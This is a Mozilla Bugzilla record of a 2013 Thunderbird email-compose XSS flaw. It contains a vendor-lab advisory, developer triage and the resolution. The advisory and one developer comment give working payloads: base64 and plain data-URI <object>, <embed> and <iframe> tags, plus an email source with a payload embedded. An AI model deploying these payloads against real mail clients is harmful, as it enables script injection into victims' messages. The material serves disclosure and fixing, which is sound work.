875818 - (wiretap) HTML compose window XSS via <object> tag on Reply/Forward ("wiretap" is back)

Status: RESOLVED FIXED

(MailNews Core :: Composition, defect)

Description

[Al Billings [:abillings - ex-MoCo]]

Title:
======
Mozilla Thunderbird - 17.0.6 - Base URI Filter Bypass & Persistent Script Code Injection Vulnerability


Date:
=====
2013-05-21


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=953


VL-ID:
=====
953


Common Vulnerability Scoring System:
====================================
3.9


Introduction:
=============
Thunderbird is a free, open-source, cross-platform application for managing email and news feeds. It is a local (rather than a web-based) email application that is powerful yet easy-to-use. Thunderbird has lots of cool features. Thunderbird gives you control and ownership over your email. There are lots of add-ons available for Thunderbird that enable you to extend and customize your email experience. Thunderbird is part of the Mozilla Manifesto, a pledge that describes Mozilla`s commitment to an open, accessible, egalitarian Internet.

Vendor Homepage: http://www.mozilla.org
Product website: http://www.mozilla.org/en-US/thunderbird/

Abstract:
=========
An independent vulnerability lab researcher discovered a filter bypass and persistent validation vulnerability in the Mozilla Thunderbird Email Software.

Report-Timeline:
================
2013-05-10: Researcher Notification & Coordination (Ateeq Khan)
2013-05-11: Vendor Notification (Mozilla - Security Incident Team)
2013-00-00: Vendor Response/Feedback (Mozilla - Security Incident Team)
2013-00-00: Vendor Fix/Patch (Mozilla - Developer Team)
2013-00-00: Public Disclosure (Vulnerability Laboratory)

Status:
========
Unpublished

Affected Products:
==================
Mozilla
Product: Thunderbird - EMail Application 17.0.6

Exploitation-Technique:
=======================
Remote

Severity:
=========
Medium


Details:
========
It has been discovered that the security controls / filters currently being used in Mozilla Thunderbird application can be easily evaded if an attacker decides to encrypt the payloads with base64 encryption and combine it with the <object> tag. During the testing, it was initially noticed that malicious javascript tags were being filtered / blocked in the Thunderbird application however, Attaching a debugger with the Thunderbird .exe file revealed some very interesting information and gave much better insight behind the actual working of the application. Most of the information revealed is Javascript errors which gave the researcher much hope in believing that the application might actually be vulnerable.

By default, HTML tags like <script> and <iframe> are blocked in Thunderbird and get filtered immediately upon insertion however, While drafting a new email message, attackers can easily bypass the current input filters by encoding their payloads with base64 encryption and using the <object> tag and insert malicious scripts / code eg. (script / frame) within the emails and send it to the victims. The exploit gets triggered once the victim decides to reply back and clicks on the \'Reply\' or \'Forward\' Buttons.

After successfully bypassing the input filters, an attacker can inject persistent script code while writing a new email and send it to victims. Interestingly the payload gets filtered during the initial viewing mode however if the victim clicks on Reply or Forward, the exploit gets executed successfully. For a POC i will be including multiple examples in this advisory for your review. I was able to run multiple scripts generating strange behaviour on the application which can be seen in the debugging errors which I have attached along with this report.

These sort of vulnerabilities can result in multiple attack vectors on the client end which may eventually result in complete compromise of the end user system. The persistent code injection vulnerability is located within the main application.

Exploitation of this persistent application vulnerability requires a low or medium user interaction. Successful exploitation of the vulnerability may result in malicious script code being executed in the victims browser resulting in script code injection, persistent phishing, Client side redirects and similar client side attacks.

Vulnerable Service(s):
			[+] Mozilla Thunderbird 17.0.6 - Latest Release 

Vulnerable Section(s):
			[+] Write (Create a new message)
			[+] Email Signature (Account Settings)
			[+] Attach File with Signature as HTML (Account Settings)


Proof of Concept:
=================
For successful exploitation of this bug, the attacker needs follow the following steps:

a) Create a new email message
b) In the body text, insert new HTML tag with the POC "Payload"
c) Send the email to the victim
d) Open the new email in the victim browser and click Reply
e) You should now see a Javascript Application popup window proving the existence of this vulnerability.


Proof of Concept #2
-------------------

a) Goto Tools and then Account Settings
b) Under the Signature Text, insert the Payload and enable 'Use HTML'
c) Close the menu and Click on "Write" to create a new email
d) You should get a popup the moment new Email editor window opens up proving the existence of this vulnerability.


Proof of Concept #3
-------------------

a) Create a new text file on your desktop (local computer) and insert the POC payload in it and save it as test.html (HTML)
b) Goto Tools and then Account Settings
c) Below the Signature Text box, enable 'Attach the signature from a file instead'  
d) Click Choose and select the 'test.html' file which you created in step a.
e) Click on Write and you should be able to see the Javascript popup proving the existence of this vulnerability.


Payload #1
----------

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiTW96aWxsYS1UaHVuZGVyYmlyZC1TY3JpcHQtQ29kZS1JbmplY3Rpb24t
UE9DLUF0ZWVxLUtoYW4iKTs8L3NjcmlwdD4=
"></object>


Payload #2
----------

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDov
L3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5
L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw
IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIk1vemlsbGEt
VGh1bmRlcmJpcmQtU2NyaXB0LUNvZGUtSW5qZWN0aW9uLVBPQy1BdGVlcS1LaGFuIik7PC9zY3Jp
cHQ+PC9zdmc+" type="image/svg+xml" AllowScriptAccess="always"></EMBED>


1.3 

POC Technical Description:
--------------------------

Here, we used the data URI payload as a value assigned to the ëdataí attribute of the ëobjectí tag. The <object> tag is used to include objects such as images, audio, videos, Java applets, ActiveX, PDF, and Flash. The ëdataí attribute of the object tag defines a URL that refers to the object's data. Data in the "data:" URI is encoded as a base64 string:

Base64-encoded payload: PHNjcmlwdD5hbGVydCgiTW96aWxsYS1UaHVuZGVyYmlyZC1TY3JpcHQtQ29kZS1JbmplY3Rpb24tUE9DLUF0ZWVxLUtoYW4iKTs8L3NjcmlwdD4=

Base64-decoded payload: <script>alert("Mozilla-Thunderbird-Script-Code-Injection-POC-Ateeq-Khan");</script>

When the browser loads the object tag, it loads an object (in our case, itís a javascript) assigned to its data attribute. This causes execution of our javascript. We were able to bypass the application blacklist filter because of the base64-encoded payload. 


1.4

Email Header showing the hidden malicious payload
-------------------------------------------------

Message-ID: <5195AABB.9000409@ccure.it>
Date: Fri, 17 May 2013 08:57:47 +0500
From: Ateeq Khan <ateeq@ccure.it>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20130509 Thunderbird/17.0.6
MIME-Version: 1.0
To: ateeq <ateeq@ccure.it>
Subject: Test
X-Enigmail-Version: 1.5.1
Content-Type: multipart/alternative;
 boundary="------------070707070308040102070208"
X-Provags-ID: V02:K0:x1sxyB72JjArK0t7OpMGlUdnbY0vjneQvJdkX/twIfw
 QgzRaY5JN/SeFJ/fl2yULg+LJCKojYYGFR/8wrcS9hv6B6WWrN
 mur6d1IsxEn2D2kZt5fQ3tk8Z1qDiEpN5C7vrtOyEFAMJR3NHg
 jsL6elL9oxDkDRj1rYWvipndH1vonoPT3kjbcmuPsEZwYZ0JkL
 BjvA5CQE3qDMPgd5nzdT8SqKBRrj9u7m/irxCWHeJcnAG0XBnK
 txadh05EhpYjzrsz2kd+EyQe8ABh9F+yHQs6PBgIJeMDhm3EmY
 KPDb5TDHAsnDSD7e3jSaj1t/jhHWc4OA+Okkw+PsyBasdNvzw=
 =
X-UI-Junk: AutoNotJunk -999 (UWL);
  V01:9SSPrMSv:3OJduITnBKJW2sO9FDRIJW8REKQH86F2DhxLUWcUUFzS1g0JhJ7
  GgRkniiwfqYstxpjhSj957gz/8tEx07A4XeXZriK0TD0WhS1DXezTz/TtZsDYDEh
  hoWYOFl3bb5yC2QDLQsFZpUW8W11Q1ueL83Jxhvv1UmeH1zGnYFLHhAFOpzxH4jN
  652vXWc8dXjmX/WjTrvcI6NDjWdTTTfnDoO2PVFxLR+Tspu5HEv+SDuyrKv18Pei
  ogK+aeYsHnGw+Sv4tyfEE3I/nLbDefudGihBnld6s0loLxOOAGeIYxOeZ4Je+v0h
  MH9Y6ICIP7qvG/CkWt1PYQDzeNRPMANzlOgD/c//0kMjpKd6GwFWZIgfLyEFGGGA
  5ghpw5skyHXrAcf+FBq4ayJpL2UIfGeghWw==
X-Nemesis-Spam: whitelist
Envelope-To: ateeq@ccure.it

This is a multi-part message in MIME format.
--------------070707070308040102070208
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit

-- 

--------------070707070308040102070208
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit

<html>
  <head>

    <meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
  </head>
  <body text="#000000" bgcolor="#FFFFFF">
    <object
data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiTW96aWxsYS1UaHVuZGVyYmlyZC1TY3JpcHQtQ29kZS1JbmplY3Rpb24tUE9DLUF0ZWVxLUtoYW4iKTs8L3NjcmlwdD4=
      "></object>
    <div class="moz-signature">-- <br>
      <script>alert(1)</script></div>
  </body>
</html>

--------------070707070308040102070208--


1.5

Interesting Raw Application Logs captured during the entire process of testing:
-------------------------------------------------------------------------------

(4fbc.3828): Break instruction exception - code 80000003 (first chance)
eax=fff82000 ebx=00000000 ecx=00000000 edx=7792f85a esi=00000000 edi=00000000
eip=778a000c esp=0ffffd94 ebp=0ffffdc0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
ntdll!DbgBreakPoint:
778a000c cc              int     3
0:040> g

[JavaScript Error: "Search service falling back to synchronous initialization at SRCH_SVC__ensureInitialized@resource:///components/nsSearchService.js:2498
@resource:///components/nsSearchService.js:3476
_adjustAcItem@chrome://messenger/content/webSearch.xml:42
@chrome://messenger/content/webSearch.xml:22
" {file: "resource:///components/nsSearchService.js" line: 2499}]
[JavaScript Error: "2013-05-18 06:02:42	gloda.datastore	ERROR	Async queryFromQuery error: 1: malformed MATCH expression: 
["<EMBED" "SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDov,L3d3dy53My5vcmcvMjA
wMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5"]
" {file: "resource:///modules/gloda/log4moz.js" line: 687}]
2013-05-18 06:02:42	gloda.datastore	ERROR	Async queryFromQuery error: 1: malformed MATCH expression: 
["<EMBED" "SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDov,L3d3dy53My5vcmcvMjA
wMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5"]

[JavaScript Error: "2013-05-18 06:02:42	gloda.datastore	ERROR	Async queryFromQuery error: 1: malformed MATCH expression: 
["<EMBED" "SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDov,L3d3dy53My5vcmcvMjA
wMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5"]
" {file: "resource:///modules/gloda/log4moz.js" line: 687}]
2013-05-18 06:02:42	gloda.datastore	ERROR	Async queryFromQuery error: 1: malformed MATCH expression: 
["<EMBED" "SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDov,L3d3dy53My5vcmcvMjA
wMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5"]

[JavaScript Error: "An error occurred executing the cmd_insertHTMLWithDialog command: [Exception... 
"Could not convert Native argument arg 3 [nsIDOMJSWindow.openDialog]"  nsresult: "0x8057000a (NS_ERROR_XPC_BAD_CONVERT_NATIVE)"  
location: "JS frame :: chrome://editor/content/ComposerCommands.js :: <TOP_LEVEL> :: line 2790"  data: no]" 
{file: "chrome://global/content/globalOverlay.js" line: 95}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." 
{file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." 
{file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." 
{file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
[JavaScript Error: "IndexSizeError: Index or size is negative or greater than the allowed amount" {file: "chrome://messenger/content/glodaFacetBindings.xml" 
line: 1736}]
[JavaScript Error: "IndexSizeError: Index or size is negative or greater than the allowed amount" {file: "chrome://messenger/content/glodaFacetBindings.xml" 
line: 1736}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." 
{file: "chrome://messenger/content/folderDisplay.js" line: 2342}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." 
{file: "chrome://messenger/content/folderDisplay.js" line: 2342}]
[JavaScript Warning: "The character encoding of a framed document was not declared. The document may appear different if viewed without the document framing it." 
{file: "data:text/html;base64,PHNjcmlwdD5hbGVydCgiTW96aWxsYS1UaHVuZGVyYmlyZC1TY3JpcHQtQ29kZS1JbmplY3Rpb24tUE9DLUF0ZWVxLUtoYW4iKTs8L3NjcmlwdD4=" line: 0}]
[JavaScript Error: "IndexSizeError: Index or size is negative or greater than the allowed amount" {file: "chrome://messenger/content/glodaFacetBindings.xml" 
line: 1736}]
[JavaScript Error: "IndexSizeError: Index or size is negative or greater than the allowed amount" {file: "chrome://messenger/content/glodaFacetBindings.xml" 
line: 1736}]
[JavaScript Warning: "The character encoding of a framed document was not declared. The document may appear different if viewed without the document framing it." 
{file: "data:text/html;base64,PHNjcmlwdD5hbGVydCgiTW96aWxsYS1UaHVuZGVyYmlyZC1TY3JpcHQtQ29kZS1JbmplY3Rpb24tUE9DLUF0ZWVxLUtoYW4iKTs8L3NjcmlwdD4=" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." 
{file: "chrome://messenger/content/messenger.xul" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." 
{file: "chrome://messenger/content/messenger.xul" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." 
{file: "chrome://messenger/content/folderDisplay.js" line: 1621}]
[JavaScript Warning: "The character encoding of a framed document was not declared. The document may appear different if viewed without the document framing it." 
{file: "data:text/html;base64,PHNjcmlwdD5hbGVydCgiTW96aWxsYS1UaHVuZGVyYmlyZC1TY3JpcHQtQ29kZS1JbmplY3Rpb24tUE9DLUF0ZWVxLUtoYW4iKTs8L3NjcmlwdD4=" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." 
{file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." 
{file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." 
{file: "chrome://global/content/bindings/toolbar.xml" line: 276}]
"chrome://global/content/bindings/general.xml" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." 
{file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." 
{file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
No chrome package registered for chrome://navigator/content/navigator.xul
[JavaScript Error: "NS_ERROR_FAILURE: Component returned failure code: 0x80004005 (NS_ERROR_FAILURE) [nsIDOMJSWindow.open]" {file: "data:text/html;base64,
PFNDUklQVD4KdmFyIHdpbiA9IHdpbmRvdy5vcGVuKCk7Cm5ldHNjYXBlLnNlY3VyaXR5LlByaXZpbGVnZU1hbmFnZXIuZW5hYmxlUHJpdmlsZWdlKAogIlVuaXZlcnNhbEJyb3dzZXJBY2Nlc3MiKTsKZm9
yICh2YXIgaT0wOyBpIDwgaGlzdG9yeS5sZW5ndGg7IGkrKykgewogd2luLmRvY3VtZW50LndyaXRlbG4oaGlzdG9yeVtpXSArICI8QlI+Iik7Cn0KbmV0c2NhcGUuc2VjdXJpdHkuUHJpdmlsZWdlTWFuYW
dlci5yZXZlcnRQcml2aWxlZ2UoCiAiVW5pdmVyc2FsQnJvd3NlckFjY2VzcyIpOwp3aW4uY2xvc2UoKTsKPC9TQ1JJUFQ+" line: 2}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." 
{file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." 
{file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
No chrome package registered for chrome://navigator/content/navigator.xul
[JavaScript Error: "NS_ERROR_FAILURE: Component returned failure code: 0x80004005 (NS_ERROR_FAILURE) [nsIDOMJSWindow.open]" {file: "data:text/html;base64,
PFNDUklQVD4KdmFyIHdpbiA9IHdpbmRvdy5vcGVuKCk7Cm5ldHNjYXBlLnNlY3VyaXR5LlByaXZpbGVnZU1hbmFnZXIuZW5hYmxlUHJpdmlsZWdlKAogIlVuaXZlcnNhbEJyb3dzZXJBY2Nlc3MiKTsKZm9y
ICh2YXIgaT0wOyBpIDwgaGlzdG9yeS5sZW5ndGg7IGkrKykgewogd2luLmRvY3VtZW50LndyaXRlbG4oaGlzdG9yeVtpXSArICI8QlI+Iik7Cn0KbmV0c2NhcGUuc2VjdXJpdHkuUHJpdmlsZWdlTWFuYWdl
ci5yZXZlcnRQcml2aWxlZ2UoCiAiVW5pdmVyc2FsQnJvd3NlckFjY2VzcyIpOwp3aW4uY2xvc2UoKTsKPC9TQ1JJUFQ+" line: 2}]

[JavaScript Error: "An error occurred executing the cmd_insertHTMLWithDialog command: [Exception... "Could not convert Native argument arg 3 
[nsIDOMJSWindow.openDialog]"  nsresult: "0x8057000a (NS_ERROR_XPC_BAD_CONVERT_NATIVE)"  location: "JS frame :: chrome://editor/content/ComposerCommands.js 
:: <TOP_LEVEL> :: line 2790"  data: no]" {file: "chrome://global/content/globalOverlay.js" line: 95}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." 
{file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
Security Error: Content at moz-nullprincipal:{37db781d-d6d3-44bb-ade4-a79dcc63c0dd} may not load or link to about:blank.
Security Error: Content at moz-nullprincipal:{44bab10a-4bd8-4cfb-a519-eb2535344039} may not load or link to about:blank

[JavaScript Error: "[Exception... "'DB failed getting form autocomplete values' when calling method: [nsIFormAutoComplete::autoCompleteSearch]"  
nsresult: "0x8057001e (NS_ERROR_XPC_JS_THREW_STRING)"  location: "<unknown>"  data: no]"]
[JavaScript Error: "aSubject.popup is undefined" {file: "resource:///modules/glodaWebSearch.js" line: 68}]

[JavaScript Warning: "The stylesheet data:,*%7bx:<script>alert(1)</script>askjn</h1>expression(write(2))%7D was loaded as CSS even though its MIME type, 
"text/plain", is not "text/css"." {file: "about:blank" line: 0}]
[JavaScript Warning: "Unknown property 'x'.  Declaration dropped." {file: "data:,*%7bx:<script>alert(1)</script>askjn</h1>expression(write(2))%7D" line: 1]

[JavaScript Error: "GenericSendMessage FAILED: [Exception... "Component returned failure code: 0x8055311a [nsIMsgCompose.SendMsg]"  
nsresult: "0x8055311a (<unknown>)"  location: "JS frame :: chrome://messenger/content/messengercompose/MsgComposeCommands.js :: GenericSendMessage :: 
line 2814"  data: no]" {file: "chrome://messenger/content/messengercompose/MsgComposeCommands.js" line: 2817}]
"chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
[JavaScript Warning: "Use of attributes' nodeValue attribute is deprecated. Use value instead." 
{file: "chrome://messenger/content/messengercompose/MsgComposeCommands.js" line: 3996}]
Security Error: Content at moz-nullprincipal:{549c3f5a-560d-4469-9b0f-09f598998b0b} may not load or link to about:blank.
Security Error: Content at moz-nullprincipal:{63e416e7-9cc4-458f-b93d-882bb2ad9121} may not load or link to about:blank.
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." 
{file: "chrome://global/content/bindings/general.xml" line: 0}]
[JavaScript Error: "Search service falling back to synchronous initialization at SRCH_SVC__ensureInitialized@resource:///components/nsSearchService.js:2498
@resource:///components/nsSearchService.js:3476
_adjustAcItem@chrome://messenger/content/webSearch.xml:42
@chrome://messenger/content/webSearch.xml:22
-----------------------------------------------------------------------------


[JavaScript Warning: "The stylesheet data:,*%7bx:<script>alert(1)</script>askjn</h1>expression(write(2))%7D 
was loaded as CSS even though its MIME type, "text/plain", is not "text/css"." {file: "about:blank" line: 0}]
stylesheet was loaded successfully as text/plain even though it should have been.


Risk:
=====
The security risk of the persistent input validation vulnerabilities are estimated as medium(+).


Credits:
========
Ateeq Khan - CCURE IT (ateek.khan@gmail.com) - (Communication: admin@vulnerability-lab.com)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.vulnerability-lab.com/register
Contact:    admin@vulnerability-lab.com 	- support@vulnerability-lab.com 	       - research@vulnerability-lab.com
Section:    video.vulnerability-lab.com 	- forum.vulnerability-lab.com 		       - news.vulnerability-lab.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

    				   	Copyright © 2013 | Vulnerability Laboratory

Comment 1

[Al Billings [:abillings - ex-MoCo]]

Attachment: Image of PoC functioning

Comment 2

[Al Billings [:abillings - ex-MoCo]]

Attachment: Thunderbird error console during PoC

Comment 3

[Al Billings [:abillings - ex-MoCo]]

Attachment: Image of debugger raw logs during PoC

Comment 4

[Mark Banner (:standard8)]

This is a duplicate of bug 868267, there's a few more test cases, but really they are all the same result.

I guess my only concern would be to ensure we've covered the svg case when we fix that bug.

Comment 5

[Al Billings [:abillings - ex-MoCo]]

Can we dupe this or otherwise make a dependency since this is an open security issue?

Comment 6

[Daniel Veditz [:dveditz]]

I don't know what the bug summary means so I'm changing it. Where does Base URI come into this anywhere?

(In reply to Al Billings [:abillings] from comment #5)
> Can we dupe this or otherwise make a dependency since this is an open
> security issue?

There are multiple issues described in this bug which means potentially multiple resolutions. That obviously can't be handled in a single bug so maybe we need to treat this as a tracker bug and split out bugs for each separate issue.

bug 868267 is strictly about self-XSS due to the signature text. That seems to match Poc2 and Poc3.

That misses the main claim of this bug that if you send this mail to a victim "if the victim clicks on Reply or Forward, the exploit gets executed successfully." PoC #1 makes no mention of the signature file and it's a different, more serious, bug. This means the old "wiretap" flaws have come back like bug 66938 etc.
https://bugzilla.mozilla.org/buglist.cgi?quicksearch=FIX+wiretap

I have tested this and the claim is accurate.

Important caveat: the victim must be using HTML compose. This is the default so not a hard condition in a real attack, but I know plain text is popular with engineers and you'll miss this bug if you test with plain-text compose windows.

In the "Forward" case the victim must forward "in-line", it does not work if you forward "as attachment". The former (vulnerable) setting is also the default.

The reporter's guess about base64 escaping filtering appears inaccurate, changing payload 1 to 

<object data="data:text/html,<script>alert(1)</script>"></object>

seems to work just as well. In addition to <object> and <embed> we also have this problem with
<iframe src="data:text/html,<script>alert(1)</script>"><iframe>

I thought we disabled Javascript at the docshell level so I don't understand how this could work. Or maybe we do on the viewing pane (which is why scripts don't run there) but can't in an editor? If we're truly relying on filtering I bet there's a lot more problems here.

Comment 7

[Benjamin Kunz Mejri]

"The reporter's guess about base64 escaping filtering appears inaccurate, changing payload 1 to .."

Yes we will also include that to the report. Much thanks for the verification and coordination of the product issue ... we will soon continue. ~bkm

Comment 8

[Boris Zbarsky [:bzbarsky]]

> I thought we disabled Javascript at the docshell level so I don't understand how this
> could work

First question: which Gecko version are we talking about here?  There were recent m-c changes to disabling JS in designMode documents (to NOT disable it) that might perhaps be relevant...  But the report is against Gecko 17, right?

Comment 10

[Daniel Veditz [:dveditz]]

I confirmed this in a release Thunderbird, so yes, that's Gecko 17.

Raising the severity because it could affect any Thunderbird recipient with default settings. All the attacker needs is to write something inflammatory or viral enough to get the victim to reply or forward. The value of what you could steal that way is probably small most of the time but users will not see it that way.

Comment 11

[Daniel Veditz [:dveditz]]

> Report-Timeline:
> ================
> 2013-05-10: Researcher Notification & Coordination (Ateeq Khan)
> 2013-05-11: Vendor Notification (Mozilla - Security Incident Team)

The Mozilla security team did not receive mail about this vulnerability until 2013-05-21 12:08 local time.

> bug 868267 is strictly about self-XSS due to the signature text.
> That seems to match Poc2 and Poc3.

Oops, I missed bug 868267 comment 15 from Mark that describes this bug. It was filed a few hours before mail about this bug was sent to us. We're awarding a split bug bounty for this one.

Comment 12

[Benjamin Kunz Mejri]

Thanks for all the cooperation and coordination. It is a totally fair decision to split the bug bounty reward because we detected the core problem with the effects around and the other researcher detected only a part of the issue in the signature like discussed ago. Good job and absolutly fair decision! We really like the transparent coordination via bugzilla. 

Best Regards,
Vulnerability Research Laboratory,
Benjamin Kunz Mejri & Ateeq Khan

Comment 13

[Andrew McCreight [:mccr8]]

Is there anybody who can fix this?

Comment 15

[Daniel Veditz [:dveditz]]

This bug is not in the compose window UI but in the core composition code itself.

Comment 17

[Ludovic Hirlimann [:Usul]]

We probably should try to fix it before 24 is released. Setting the tracking flag.

Comment 18

[Mark Banner (:standard8)]

(In reply to Boris Zbarsky (:bz) from comment #8)
> > I thought we disabled Javascript at the docshell level so I don't understand how this
> > could work
> 
> First question: which Gecko version are we talking about here?  There were
> recent m-c changes to disabling JS in designMode documents (to NOT disable
> it) that might perhaps be relevant...  But the report is against Gecko 17,
> right?

I've just done some retesting of what I'd originally done in bug 868267. This bug does not seem to affect TB 23/24/25. It does affect TB 17.

afaict in all cases the docshell is getting the allowJavascript attribute set to false.

Comment 22

[Mark Banner (:standard8)]

bz: do you have any ideas on where to look for something that might be back-portable to ESR 17, or otherwise easy fix? See also comment 18.

Comment 23

[Boris Zbarsky [:bzbarsky]]

Not offhand.  Worth bisecting (at least on nightlies) to figure out what fixed this?

Comment 24

[Mark Banner (:standard8)]

Now Thunderbird 17.0.x series is obsolete and updates have been offered to TB 17esr users, I have re-tested Thunderbird 24.0.x and it is still unaffected by this issue. Therefore resolving this as WFM.

It would still have been nice to figure out what broke/fixed this, but this is no longer an issue.

Comment 25

[Benjamin Kunz Mejri]

Hello Mozilla Security Team,

Just wanted to know if this vulnerability has been patched completely. From the comments and current status we assume the bug has been patched. 

Best Regards,

Ateeq Khan
Sr Manager PT
Evolution Security (Vulnerability Labs)
http://evolution-sec.com

Comment 26

[Daniel Veditz [:dveditz]]

Ateeq: this is patched in Thunderbird 24.x. Thunderbird 17.x was not patched but is no longer supported.

Comment 27

[chris hofmann]

when bugs like this get marked "works for me" they don't get on the radar for vulnerability notices, and atleast proper credit for discovery of the problem. 

probably should be marked as fixed and we should follow up in publishing a vuln notice with the next batch, or we need to expand the query for catching bugs for vuln notes.

could also be time to also open up this bug since details have been posted in several places.

Mozilla Bug Bounty #5 - WireTap Remote Web Vulnerability - http://seclists.org/bugtraq/2014/Jan/103

Vuln: Mozilla Thunderbird Remote Security Bypass Vulnerability - http://www.securityfocus.com/bid/65158

Bugtraq: Mozilla Bug Bounty #5 - WireTap Remote Web Vulnerability - http://www.securityfocus.com/archive/1/530893

Comment 28

[Al Billings [:abillings - ex-MoCo]]

Opening up this bug since it has been fixed for some time and is being discussed publicly.